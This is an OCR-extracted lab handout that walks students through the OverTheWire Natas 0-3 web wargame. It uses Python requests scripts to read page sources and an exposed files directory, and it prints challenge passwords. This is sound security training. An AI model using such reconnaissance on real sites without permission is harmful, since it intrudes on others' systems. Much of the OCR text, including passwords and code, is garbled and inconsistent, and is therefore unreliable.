Laboratory Exercise — Natas Level 0-6
1. Overview

In this lab exercise, students will learn new skills by setting up the Sublime Text editor with Python and
using it to test web applications. Using the Brigante (2020) environment, students will be presented with
progressive challenges from the OverTheWire website (Natas) in which they will use previously learned
skills to find the Capture the Flag (CTF) flags.

2. Resources required

This exercise requires the Brigante VM running in the Cyber Range.

3. Initial Setup

For this exercise, you will log in to your Cyber Range account, select the Brigante (2020) environment,
click “start” to start your environment, and then “join” to get to your Linux desktop.

4. Tasks
Task 1: Setting up SublimeText

The first thing we need to do is download and install the GPG key (GNU PGP Key). This allows for a
secure download from the creators of SublimeText. Then we will configure the repo for the version of
SublimeText we are downloading. The final step is to update and install the application. This is a CentOS
Linux distribution, so some of the commands will be slightly different.

e |narootterminal, type the following: yum install python python3-pip when prompt
type y and press enter.
e |narootterminal, type the following: pip3 install requests-html and press enter.

e |naroot terminal, type the following:
rpm -v --import https://download.sublimetext.com/sublimehg-rpm-pub.gpg

and press enter. The terminal will return to the prompt if completed correctly.

e Type the following: yum-config-manager --add-repo
https://download.sublimetext.com/rpm/stable/x86 64/sublime-text.repo
and press enter.

o Type the following: yum install sublime-text and press enter. When prompted type y
and press enter.

[root@ip-10-1-49-229 student]# yum-config-manager --add-repo https://download.sublimetex
t.com/rpm/stable/x86_64/sublime-text.repo

Loaded plugins: fastestmirror

adding repo from: https://download.sublimetext.com/rpm/stable/x86_64/sublime-text.repo

grabbing file https://download.sublimetext.com/rpm/stable/x86_64/sublime-text.repo to /e
tc/yum.repos.d/sublime-text.repo

repo saved to /etc/yum.repos.d/sublime-text.repo

[root@ip-10-1-49-229 student]# [J

© 2021 Cyber Range. Created by R. Eric Kiser. (CC BY-NC-SA 4.0) ) R

KISE



Package Version

Installing:
sublime-text

Transaction Summa
Install 1 Package

Total download size:
Installed size: 33 M
Is this ok [y/d/N]: y
Downloading packages:
sublime-text-3211-1.x86_64.rpm | 13 MB 00:00:00
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
Installing : sublime-text-3211-1.x86_64
Verifying : sublime-text-3211-1.x86 64

Installed:
sublime-text.x86_64 0:3211-1

Terminal - root@ip-10-1-169-192:/home/student

File Edit View Terminal Tabs Help

sublime-text sublime-text

Transaction Summary

Total download size:
Installed size: 48 M
Is this ok [y/d/N]: y
Downloading packages:
sublime-text-4126-1.x86_64.rpm | 20 MB 00:00
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
Installing : sublime-text-4126-1.x86_ 64
Verifying : sublime-text-4126-1.x86_64

Installed:
sublime-text.x86_64 0:4126-1

Complete!
[root@ip-10-1-169-192 student]# i

Now we can click on the magnifying glass at the bottom of the screen on the desktop and search for
Sublime Text. Right click on the application logo and click Add to Bookmarks. In addition, you can click
and drag the application logo to the desktop to create a shortcut. Once you have your shortcuts setup,
click the Launch button.
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Application Finder

'L_-'. All Applications
Bookmarks
é%} Commands History

Add to Bookmarks |
[.i:Accessories % Execute

< Development 2 Edit

(@) Internet

R Multimedia

‘}\'_’f Office

71| Settings

iL)f System

|E| Preferences Launch
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Application Finder

subl

“.!_n'. All Applications Sublime Text

@ Bookmarks Sophist

5:3 Commands History ™ Add to Bookmarks

IFLS Accessories &% Execute
T Development

‘@)‘ Internet

Bﬂ]cu Multimedia

%4 office

¥4%| Settings

System

Y22 Preferences

In Sublime Text, we need to set up a few things so that we can build and see our code. To do this, we
will need to install the Package Control and Buildview.

e Toinstall the Package Control, press ctrl+shift+p, and then in the search box, type Install
Package Control.

4

© 2021 Cyber Range. Created by R. Eric Kiser. (CC BY-NC-SA 4.0)




package

B OMEERRAR N IS A e L Y R e E e

Package Control: Upgrade Package

Package Control: Advanced Install Package

Package Control: Create Package File

Package Control: Install Local Dependency

Package Control: List Unmanaged Packages
View Package File
Preferences: Package Control Settings - Default
Preferences: Package Control Settings - User
Install Package Control

preferences: Browse Packages

Package Control: Upgrade/Overwrite All Packages

B8 untitled * - Sublime Text (UNREGISTERED)

g File Edit Selection Find View Goto Tools Project Preferences Help

4P untitled

. PACKAGE|

View Package File

Install Package Control

Preferences: Browse Packages

e Toinstall a package press ctrl+shift+p and click on Package Control: Install Package.
e In the package control search box, type buildview.

Package Control:install

Package Control: Install Package
Package Control: Install Local Dependency

Package Control: Advanced Install Package

%S.natas.labs.overthewire.org' % username

buildview

Buildview
A Sublime Text plugin to show build output in a view.
install v1.2.3; github.com/rctay/sublime-text-buildview
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File Edit Selection Find View Goto

4> untitled
1 . .
buildview
Buildview

B8 untitled » - Sublime Text (UNREGISTERED) O meEl3

A Sublime Text plugin to show build output in a view.
install v1.2.3; github.com/rctay/sublime-text-buildview

Preferences Help

Now to build our code, we will have to set the build language.

® |nthe SublimeText editor, type: ##! /usr/bin/env python
e Click the Tools menu, select Build System, and then check the Python box.

oto Tools Project Preferences

Command Palette...

Snippets...

Build System
Build

Build with...
Cancel Build
Build Results
Save All on Build

Record Macro

Save Macro...

Macros

Developer

e o

D Automatic

» (J Actionscript

3 (J Ant

() c single File
() c++ single File
(3 cargo

Opo

(J odub

(J erlang

[ Haskell

[j JavaC

O wa

() make

(¥ python
Or

[ Ruby

[ Rust

(O shellscript
C] Syntax Tests

New Build System...
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a ##!/usr/bin/env python * - Sublime Text (UNREGISTERED)

File Edit Selection Find View Goto Tools Project Preferences Help

4P ##Yusr/binfenv python e Command Palette... ctri+shift+pP

Snippets...

1  ##!/usr/bin/env pythod

Build System
Build ctrl+B
Build with... Ctri+shift+B
Build Results
Save All on Build
Record Macro ctri+Alt+Q
Save Macro...

Macros

Developer

] Line 1, Column 23

D Automatic
D ActionScript
(] Ant

(] c single File
() c++ single File
C] Cargo

(Jo

(J) odub

(] Erlang

(] Graphviz
() Haskell

(] javac

(] wa

() make

(] perl

(Or

(] Ruby

D Rust

(7] shellscript
C] Syntax Tests

New Build System...

® On the Desktop, create a folder named natas.

e In Sublime Text, save your file as natas0.py in the natas folder you just created on the Desktop.
e Now we need to exit out of Sublime Text and open it back up.

e To get the split screen, press alt+shift+2.

® Press ctrl+b to build the output.

E ~/Desktop/brigantel - Sublime Text (UNREGISTERED)

File Edit Selection Find View Goto Tools Project Preferences Help

<» brigantel
##!/usr/bin/env python

v <> Build output

[Finished in 0.0s]
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s [Finish in 0.0s] * - Sublime Text (UNREGISTERED)
File Edit Selection Find View Goto Tools Project Preferences Help

4P  natasO.py natas0.py natas0.py . Build output . Build output . = ¥ 4P ([Finishin 0.0s] °

1 [Finish in 04051[

o

Task 2: Python Programming Natas 0-1
The goal in the lesson is not to be an expert in Python. The idea is to learn how Python can be used to
parse information from a website using simple scripts. Don’t focus too much on being a perfect Python

programmer. Rather focus on the patterns that you see when programming and parsing information.

e In a browser, navigate to https://overthewire.org/wargames/natas/natas0.html

To the left, you can see all the challenges. They are progressive and will get more difficult as we
proceed.

e Copy and paste the link from the page into a new tab in the browser.

http://natas0.natas.labs.overthewire.org
® Enter the username natasO0 and the password natas0.

ATASO

You can find the password for the next level on this page.

New Tab X |+

itas.labs.overthewire.org

Q Authentication Required L [E)

http://natas0.natas.labs.overthewire.org is requesting your username and password. The
{ site says: “Authentication required”

User Name: natas0

Password: | 90000e|

Cancel OK

8
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<« c @ i overthewire.org A R

SusMIT
TOKEN

You can find the password for the next level on this page.

e Right click on the page and click View Page Source.

Save Page As...
Save Page to Pocket

Send Page to Device

Select All
View Page Source
View Page Info
Inspect Accessibility Properties
Inspect Element (Q)
%% Search Shodan for current website

Take a Screenshot

<html>

<head>

<!-- This stuff in the header has nothing to do with the level -->

"stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />

<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>

<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>

<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level™: "natase", "pass": "natas@" };</script></head>

<body>

<hl>natas@</hl>

<div id="content">

You can find the password for the next level on this page.

<!--The password for natasl is gtVrDuiDfck831PqWsLEZy5gyDzlclto -->
</div>
</body>
</html>

Q http://natas0.natas.labs.overthewire.org/ - Mozilla Firefox

B OverTheWire: Natas Lev: X | natasO.natas.labs.overthew X | http:/natasO.natas.labs.ove X | 4

c i) view-source:http://natas0.natas.labs.overthewire.org/ e
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->

<link rel="stylesheet" text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" http://natas.labs.overthewire.org/css/jquery-ui.css" />

<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />

<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>

<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>

<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.]js"></script>
<script>var wechallinfo = { "level": "natas@", "pass": "natas@" };</script></head>

<body>

<hl>natas0</h1l>

<div id="content">

You can find the password for the next level on this page.

<!--The password for natasl is g9D9cREhs1qBKtcA2uocGHPTMZVz
</div>
</body>
</html>
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Natas 1 password: g9D9cRehslqBKtcA2uocGHPfMZVzeFK6
The password can be shown in the page source as a comment. When testing a web application, it is

always important to view the source. Sometimes you can find sensitive information that leads to a
deeper understanding of the application or its owners.

To prevent error messages, we can create a new python2 build system inside of SublimeText.

e In SublimeText, click Tools -> Build System -> New Build System
e Copy and paste the following code:

{
llcmdll: [prthonzll' ll_ull’ llsfilell],
"file_regex": "A[ 1*File \"(...*?)\", line ([0-9]*)",
"selector": "source.python"

}

4P natasO.py x Python2.sublime-build

e Click File > Save As and name the file python2.sublime-build. Then click Save.

e C(lick Tools -> Build System -> python2
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to Tools Project Preferences Help

Command Palette... Ctrl+shift+pP
Snippets...

Build System () Automatic

Build Cctrl+B

(] ActionScript

Build with... ctrl+shift+B | [] Ant

cancel Build ctri+Break (] csingle File

Build Results » [J c++ single File
B (4 save All on Build (] cargo

Record Macro ctrl+Alt+Q (] D

Playback Macro  Ctrl+Alt+shift+Q | (J D dub

Save Macro... (] erang

Macros » (] Graphviz

(] Haskell
(] Javac
C] Lua

(] make
(] perl

(] python
z Python2

(] python3

— _

Developer

11

© 2021 Cyber Range. Created by R. Eric Kiser. (CC BY-NC-SA 4.0)

MR
KISEE



to Tools Project Preferences Help

Command Palette... Ctri+Shift+P BRSNS Build output

Snippets...

Build System (] Automatic
Build ctrl+B (] ActionScript
Build with... Ctrl+shift+B [ ] Ant

(] c single File

Build Results » (] c++ singleFile
(v save All on Build (] cargo
Record Macro ctri+Alt+Q (] D
(] Ddub
Save Macro... (] erlang
Macros » [] Graphviz

(] Haskell

C] JavaC
C] Lua
(] make
(] per
(¥ Python

Developer

(] shellscript
C] Syntax Tests

New Build System...

e Exit out and restart SublimeText.
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From this point on, be sure to pay close attention to the colors in the screenshots. A simple typo can
lead to an error and the colors help pinpoint where the line error is. In Sublime Text editor, under the
shebang (#!), add the following to the natas0.py file (see image below):

#!/usr/bin/env python

import requests

import re

url = 'http://natas0.natas.labs.overthewire.org/'
r = requests.get(url, auth = ('natas0', 'natas0'))

print r.text

natas0.py

requests

]
url http://natas®.natas.labs.overthewire.org/
r requests.get(url, autl (*natas®’', 'natasf'))

r.text

LTS (VTS oIS

4P natasO.py python2.sublime-build Build output Build output

requests
re

requests

r.text

e Save the code with CTRL+s (you will want to do this frequently).
Python Code Breakdown:

- import requests - Imports the request module that allows http requests to be made.

- import re - Imports the module “Regular expressions” allowing characters such as the backslash
("\") to be used without invoking their special meaning.

- r=requests.get(url, auth = (‘natas0’, ‘natas0’)) - This sets the variable r to access the get
request with authorization using the username and password that we set (username first, then
password).

13
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- print r.text - prints the results of the variable r. In this case, the get request with authorization.
e In the natas0.py tab, press CTRL+b to build the program and output it in a new tab.

The first time you do this, you may have to click and drag the tab to the other side of the split screen to
get the results in the screenshot below.

=] ~/Desktop/natas0.py - Sublime Text (UNREGISTERED)

File Edit Selection Find View Goto Tools Project Preferences Help

requests
re
rthewire.o
rthewir
/n

ript></head>

d for the next level on this page.

rd for natasl is gtVrDuiDfck831PaWsLEZySgyDzlclto -->

i Applications : [B Build output - Sublime ... 13:21 || CyberRange Student [

File Edit Selection Find View Goto Tools Project Preferences Help

the next level on th

or natasl is g9D9cREhs1gBKt

As you can see, the request is now in the build output tab and the next password for natas1 is there.
Task 3: Python Programming Natas 1-2
The next challenge is a bit easier since all we really need to do is change a few parameters to our code.

In the natasO.py tab, change the url to http://natasl.natas.labs.overthewire.org/
In the r variable, change the username ‘natas0’ to ‘natasl’

In the r variable, change the password ‘natasQ’ to the password discovered in the previous task.
Using the CTRL+SHIFT+S, save the file as natas1-2.py to the natas folder on your Desktop.
In the natas1-2.py tab, press CTRL+b to build the program. See the images below.

14
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4) Natas1-2.py

requests
re

url http://natasl.natas.labs.overthewire.o

requests.get(url, ) ('natasl', 'gtVrDuiDfck831PqWsLEZ

r.text

4 Build output

<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
tylesheet" text/css" href="http://natas.labs.overthewire.org/css/level.css">
tylesheet" http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-u s"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script
http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level "'natasl", "pass": "gtVrDuiDfck831PqWsLEZy5gyDzlclto"
};</script></head>
<body oncontextmenu="javascript:alert('right clicking has been blocked!');return false;">
<hl>natasl</h1>
<div id="content">
You can find the password for the
next level on this page, but rightclicking has been blocked!

<!--The password for natas2 is ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi -->
</ aive

</body>

</html>

[Finished in ©0.7s]

¥ Applications 5 [401L -Mo... |l ~/o ] a 14:15 ||| Cyber Range Student gl

s ~/Desktop/natas/natas1-2.py - Sublime Text (UNREGISTERED)

file Edit Selection Find View Goto Tools Project Preferences Help
4P natasl-2.py natas0.py 4+ ¥ 4»  Buidoutput

<html>

) Line 13, Column 1 Tab Size: 4 Python

Natas 2 password: h4ubbcXrWqsTo7GGnnUMLppXb0ogfBZ7

It appears there is a pattern of “<! --the password for natas# is passwordhere -->".
Because of this, we can make a few adjustments to the Python code so we don’t have to keep looking
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through the entire html output. Instead, we can use re. findall to search through the html page for
this pattern.

® |nthe natasl-2.py tab, delete print r.text andinits place add print re.findall ('<!--
The password for natas2 is (.*) -->', content) [0] (REMINDER: Don't forget to
save the file every time you make a change.)

e Addtheline content = r.text afterthe r = requests.get... as shown in the screenshot
below

e Inthe natasl-2.py tab, press CTRL+b to build the program.

url = . 5. labs.overthewire.org/
r = requests.get(url, auth = ('natasl’, 'gtVrDuiDfck831PqWsLEZy5gyDzlclto'))

content = r.text

print re.findall('<!--The password for natas2 is (.¥) > content) [0]

Builld output

ZluruAthQk7Q2MgmDeTiU1j2ZvWy2mBi

[Finished in 0.4s]

’ ~/Desktop/natas/natas1-2.py - Sublime Text (UNREGISTERED)
fle Edit Selection Find View Goto Tools Project Preferences Help

» natasl-2.py natas0.py N natasl-2.py

h4ubbcXrWgsTo7GGnnUMLppXb0og fBZ7
2 [Finished 366ms]
t requests
tre

r requests (url, autk
content Gitext

content) [0]

e To complete this task on the site, you simply use the username and password from natas1 at
http://natasl.natas.labs.overthewire.org then right click outside of the container to view the
source.

right clicking has been blocked!

16
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e Mozilla Firefox + _ O

natasl.natas.labs.overthew X | 4

“— c @ G overthewire.org w N O ® =

NATAS1

=
woin, SusmiT

TOKEN

You can find the password for the next level on this page, but
rightclicking has been blocked!

You can find the password for the next level on this page, but
rightclicking has been blocked!

Save Page As

Save Page to Pocket

Send Page to Device

Select All
ge Source
Page Info
Inspect Accessibility Properties
Inspect Element ()
% Search Shodan for current website

Take a Screenshot

<html>

<head>

<!-- This stuff in the header has nothing to do with the level -->

<link rel="stylesheet" text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" http://natas.labs.overthewire.org/css/jquery-ui.css" />

<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />

<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>

<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>

<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level”: "natas@", "pass": "natas@" };</script></head>

<body>

<hl>natas0</hl>

<div id="content">

You can find the password for the next level on this page.

<!--The password for natasl is gtVrDuiDfck831PqWsLEZy5gyDzlclto -->
</div>
</body>
</html>
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Q http://natasl.natas.labs.overthewire.org/ - Mozilla Firefox

natasl.natas.labs.overthew' X | http:/natasl.natas.labs.ove X | <+

“— c i) view-source:http://natasl.natas.labs.overthewire.org/ w N O ® =
<html>
<head>
J This stuff in the no ith the leve

<link rel="stylesheet" type="text/css natas.labs.overthewire.org/css/level.css">

<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />

<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />

<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>

<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>

<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/we
<script>var wechallinfo = { "level": "natasl", "pass": "g9D9cREhslqBKtcA2uocGHPfMZVzeFK6" };</script></head>
<body oncontextmenu="javascript:alert('right clicking has been blocked!');return false;">

<hl>natasl</hl>

<div id="content">

You can find the password for the

next level on this page, but rightclicking has been blocked!

--The password for natas2 is
</div>
</body>
</html>

h4ubbcXriwgsTo7GGnnUMLppXb0ogfBZ7 -->

Task 4: Python Programming Natas 2-3

Visit http://natas2.natas.labs.overthewire.org/ for the next challenge and use the username natas2 and
the password retrieved from the previous task.

B e T 2 T e e e S T T S T s R e e

NATAS2

There is nothing on this page

Q Mozilla Firefox

natas2.natas.labs.overthew X | http:/natasl.natas.labs.ove X | =+

— c i overthewire.org w iINn DO ® =
NATAS2

SusMIT
TOKEN

7
We Glall
'y

There is nothing on this page

e Right click on the page and view the source code
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<html>

<head>

<!-- This stuff in the header has nothing to do with the level -->

<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">

<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />

<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />

<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>

<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>

<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas2", "pass": "ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi" };</script></head>
<body>

<hl>natas2</h1>

<div id="content">

There is nothing on this page

<img src="files/pixel.png">

</div>
</body></html>
Q http://natas2.natas.labs.overthewire.org/ - Mozilla Firefox ? o @
natas2.natas.labs.overthew X | http:/natas2.natas.labs.ove’ X | http:/natasl.natas.labs.ove: X | =+
— c (i) view-source:http://natas2.natas.labs.overthewire.org/ w N @O ® =
<html>
<head>

<!-- This stuff in the header has nothing to do with the level -->

<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />

<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />

<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>

<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>

<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/we

<script>var wechallinfo = { "level": "natas2", "pass": "h4ubbcXrWqsTo7GGnnUMLppXbOogfBZ7" };</script></head>
<body>

<hl>natas2</h1>

<div id="content">

There is nothing on this page

<img src="files/pixel.png">

</div>

</body></html>

It appears that nothing is there. Let’s check this out in the Python code. First we need to make a few
changes. Since the pattern is no longer there we need to take this out for now. We also need to add a
new print function.

e Change all locations where you have natasl to natas2.

® Deletetheprint re.findall('<!--The password for natas2 is (.*) -->',
content) [O0]

e Add print content to call the variable content.
e Save this file as natas2-3.py and then build the output.

4 natas2-3.py

requests
re

url htt /natas2.natas.labs.overthewire.org/

r requests.get(url, auth ('natas2’, ZluruAthOk702!-1queTiUijZZV\-IyZmBJ.| ))

content r.text

content

Notice the img src location. It appears to be in a directory called files.
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<> Build output

<html>

<head>

<!-- This stuff in the header has nothing to do with the level -->

<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>

<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>

<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script
src="http://natas.labs.overthewire.org/js/wechall.js"></script>

<script>var wechallinfo = { "level": "natas2", "pass": "ZluruAthQk7Q2MgmDeTiUij2Zvwy2mBi"
};</script></head>

<body>

<hl>natas2</h1>

</body></html>

[Finished in 0.3s]

W Applications © @ httpy//natas2.natas.labs... [B ~/Desktop/natas/natas... Lra 17:32 ||| Cyber Range Student [

s /Desktop/natas/natas1-2.py - Sublime Text (UNREGISTERED)

File Edit Selection Find View Goto Tools Project Preferences Help

4P notes2-3.py natas0.py

requests ! the header has nothing to do with the level
re t t ref="htt

(url, auth = ('natas? 4ubbcXriigsTe LppXb0og fBZ s
script
content r.text body
hl>natas2</hl:
content ¢ tent
nothing on this page

html

387ms]

e Change the url in the natas2-3 tab to match the img src location by appending the url with
/files/.

port requests
import re

url = "http://natas2.natas.labs.overthewire.org/files/

r = requests.get(url, auth = ('natas2', 'ZluruAthQk7Q2MgmDeTiUij2ZvWy2mBi'))

content = r.text

1t content

It appears that we are able to navigate to the files folder. Note: if your build output loses its format
coloring, use CTRL+SHIFT+P and search for Set Syntax: HTML. IMPORTANT: Be sure to complete
this in the Build output tab.
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4 Build output

<! HT o/l DTD HTML 3.2 Fi

>Index of /files</
>

<body>
<hl>Index of /files</nl>

ef="7C=N;0=D">Name</
">Size</a></th><th><

K.gif" alt="[Pi

T]"></td><td><a href="u txt">users. txt

>Apache/2.4.10 (Debian) Server at natas2.natas.labs.overthewire.org Port 80</
</body></html>

[Finished in 0.5s]

i Applications : @ 2.natas.labs... [ ~/D t: [ ] a 17:36 ||, Cyber Range Student [

~/Desktop/natas/natas2-3.py - Sublime Text (UNREGISTERED)

File Edit Selection Find View Goto Tools Project Preferences Help

natas0.py

Last modified

2.4.52 (Ubun

[ Line 14, Column 1 Tab Size: 4 HTML

This is hard to read. Let’s install a package that will organize this code a little better.

e |n the build output tab, press CTRL+SHIFT+P and type install package and click Package
Control: Install Package then search for HTMLBeautify and click on it to install.
e |n the build output tab, press CTRL+SHIFT+P and type HTMLBeautify and click on it

install

Package Control: Install Package

Package Control: Install Local Dependency
Package Control: Advanced Install Package

Selection: Select All
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htmibj

HTMLBeautify

A plugin for Sublime Text that formats (indents) HTML source code.

install v2018.03.01.21.41.57; github.com/rareyman/HTMLBeautify

[t

HTMLBeautify

HTMLPrettify

HTML: Encode Special Characters
HTMLPrettify: Set Keyboard Shortcuts

HTMLPrettify: Set Plugin Options

"-//W3C//DTD HTML 3.2 Final//EN">

'>SName</a></th><
;0=A">Size</a></

"5"><

gn="top"><

/">Parent Directory</a></td><td>&
sp;</td></tr>

></the</Tr>

); </
/icons/il

png</a></td><

</td><td>&

Y
"/icons/text.gif" a

>users.txt</a></
ign="right">145 </td><td>
0 5"><hr></th></

</

It makes code easier for humans

Ctrl+Alt+Shift+F

Ctrl+Shift+H

Ctri+Alt+H

Ctri+Alt+H, o

="[ICO0]"></th><th><

>Last modified</a></th><

=A">Description</a></

="/icons/back.gif" alt="[PARENTDIR]"></td><td>
>< all

gn="right"> -

if" alt="[IMG]"></td><td><
right">2016-12-15 16:07 </

XT]"></td><td><

rléht”>2016- 12-20 05:15 </

>
< >Apache/2.4.10 (Debian) Server at natas2.natas.labs.overthewire.org Port 80

</ >
</ ></ >
[Finished in 0.4s]
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- ~ - . — ===y === —es s

s ~/Desktop/natas/natas1-2.py - Sublime Text (UNREGISTERED)

File Edit Selection Find View Goto Tools Project Preferences Help

2.natas. lab

) Line 17, Column 15 Tab Size: 4

This will have to do for now. Take notice of the hféf=”users.tﬁ." This looks interesting. Let’s visit this
location using our code.
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Index of /files

of /files

V Of plank.gl [ICO]
; 0=D">Name ef C=M;0=A">Last modified
Size i C=D;0=A">Description

V tor
Parent Directory

+ 2 3 S = rTMel

pixel.png ‘ 2022-09-01 06:27
£">303

5. txt">users. txt , Jht">2022-09-01 06:27
£">145

Apache/2.4.52 (Ubuntu) Server at natas2.natas.labs.overthewire.org Port 80

[Finished in 369ms]

Build output

//DTD HTML 3.2

5"><hr></
Lign="top">< S /icons/back.gif" alt="[PARENTDIR]"></td><td>
/">Parent Directory</a></td><td>&nb </td>< a ight"> -
</td></
S / alt="[IMG] "></td><td><
.png</a></ 3 ight">2016-12-15 16:07 </
right">303 </ ) >
Top">< / 5 alt="[TXT]"></td><td><
">users.txt</a></ a ight">2016-12-20 05:15 </
£">145 </td><td> ) >
></th></
</
< >Apache/2.4.10 (Debian) Server at natas2.natas.labs.overthewire.org Port 80
</ >
</ ></ >
[Finished in 0.4s]|

® |nthe natas2-3.py tab, change the url to match
http://natas2.natas.labs.overthewire.org/files/users. txt

e Save the file and then build the program.

requests
re

url http://natas2.natas.labs.overthewire.org/fil rs.txd

r requests.get(url, autk ( , 'ZluruAthQk7Q2MqmDeTiUij
content r.text

content
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4) Build output

# username:password

alice:BYNdCesZqW

bob: jw2ueICLVT

charlie:G5vCxkVV3m
natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd70GrD14

eve:zo4mIWyNj2
mallory:9urtcpzBmH

[Finished in 0.3s]

e Mozilla Firefox

natas2.natas.labs.overthew X | +
&« = 0 () natas2.natas.labs.overthewire.org/file

# username:password

alice:BYNdCesZqw

bob:jw2ueICLVT

charlie:G5vCxkVV3m
natas3:G6ctbMISNb4cbFwhpMPSvxGHhQ7I6W8Q
eve:zod4mIWyNj2

mallory:9urtcpzBmH

There you have it, the next password for natas3.
Task 5: Python Programming Natas 3-4
As completed in previous tasks, we want to change the Python code to match our new parameters.

e Take a look at the screenshot to check if you have all the parameters correct.
<» natas2-3.py

requests
re

url http://natas3.natas.labs.overthewire.org

r = requests.get(url, auth ("natas3', 'sJIJNW6ucpubHPZ1ZAchaDtwd70GrD14")

content r.text

content

e Save the file as natas3-4.py and then build the program to look at the response.
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Build output

re. ova/css/] uery-ui.css" />

SS /ucchﬂl css" />

rthewire.org/js/jquery-ui.js"></

http://natas.labs. O/t'{ThE’ulre or
<

wechallinfo = { "1
ucpubHPZ1ZAchaDtwd70GrD

<hl>natas3</h1>
< id="content">

There is nothing on this page

</ >
</ ></ >

[Finished in 0. 4sﬂ

rthewire.o /wechall-data. js></

I am not liking this color scheme as it is hard on the eyes. Let’s use the package controller to install a

better color scheme.

® Press CTRL+SHIFT+P and type Package Control: Install Package

e Click Package Control: Install Package
e Type Dark Neon Color Scheme and click the scheme.

8| Darkula Color Scheme
Intelli) Darkula Sublime Text / TextMate Color Scheme

install v2019.09.20.07.17.25; packagecontrol.io/packages/Darkula%20Color%20Scheme

i Dark Fusion Color Scheme

Port of Atom's Dark Fusion Syntax

install v1.5.0; github.com/willsoto/dark-fusion-syntax

! Dark Knight Color Scheme

egant dark color scheme for Sublime Text

install v0.1.4; packagecontrol.io/packages/Dark%20Knight%20Color

Dark Neon Color Scheme

Dark Neon theme for Sublime Text, Mou, & O

install v2016.02.11.19.59 github.com/RainyDayMedia/DarkNeon

Dark Pastel Color Scheme
Dark pastel-colored Sublime Text / TextMate Color Scheme

20Scheme

® Press CTRL+SHIFT+P and type UI: Select Color Scheme and click the result.

e Click on Dark Neon (or the color scheme that you prefer).

Now let's look at the Build output.
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Build output Build output

htm!

<link rel="stylesheet" t "text/css" href="http://natas.labs.overthewire.org/css/
level €ss">
<1i 1="stylesheet" "http://natas.labs.overthewire.org/css/jquery-ui.css"
tylesheet" h http://natas.labs.overthewire.org/css/wechall.css" />
http: //natas labs.overthewire.org/js/jquery-1.9.1.js" >
1ttp //natas.labs. overthenlre org/]s/]query ui.j

http /natas labs owerthewlre org/]s/uechall js

var wechallinfo = { "level": "natas3", "pass
sJIINW6ucpubHPZ1ZAchaDtwd70GrD14" }; c

[Finished in 1.4s]

| am not a fan of the inefficiencies of moving to the browser to complete the challenges. | will show
some screenshots, but will not be walking through the browser method; however, at this point, you
should be able to test these on your own if you are interested. Here is what it looks like on the webpage.

<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
